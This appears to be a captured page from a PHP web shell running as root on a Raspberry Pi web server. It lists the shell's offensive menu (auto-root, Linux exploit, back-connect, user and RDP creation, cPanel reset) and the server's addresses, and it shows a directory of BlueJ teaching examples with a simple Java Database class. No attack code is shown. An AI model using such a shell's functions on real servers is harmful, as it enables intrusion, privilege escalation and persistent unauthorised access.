Linux lorencats.com 5.10.103-v7l+ #1529 SMP Tue Mar 8 12:24:00 GMT 2022 armv7l
Apache/2.4.59 (Raspbian)
: 10.0.0.29 | : 216.73.216.130
Cant Read [ /etc/named.conf ]
7.3.31-1~deb10u7
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
BlueJ /
people /
[ HOME SHELL ]
Name
Size
Permission
Action
Database.ctxt
363
B
-rw-r--r--
Database.java
885
B
-rw-r--r--
Person.ctxt
734
B
-rw-r--r--
Person.java
1.22
KB
-rw-r--r--
README.TXT
1
KB
-rw-r--r--
Staff.ctxt
684
B
-rw-r--r--
Staff.java
1.1
KB
-rw-r--r--
Student.ctxt
550
B
-rw-r--r--
Student.java
1000
B
-rw-r--r--
package.bluej
855
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Database.java
import java.util.ArrayList; import java.util.Iterator; /** * A very simple database of people in a university. This class simply stores * persons and, at request, lists them on standard output. * * Written as a first demo program for BlueJ. * * @author Michael Kölling * @version 1.1, March 2002 */ public class Database { private ArrayList<Person> persons; /** * Create a new, empty person database. */ public Database() { persons = new ArrayList<Person>(); } /** * Add a person to the database. */ public void addPerson(Person p) { persons.add(p); } /** * List all the persons currently in the database on standard out. */ public void listAll () { for (Iterator i = persons.iterator(); i.hasNext();) { System.out.println(i.next()); } } }
Close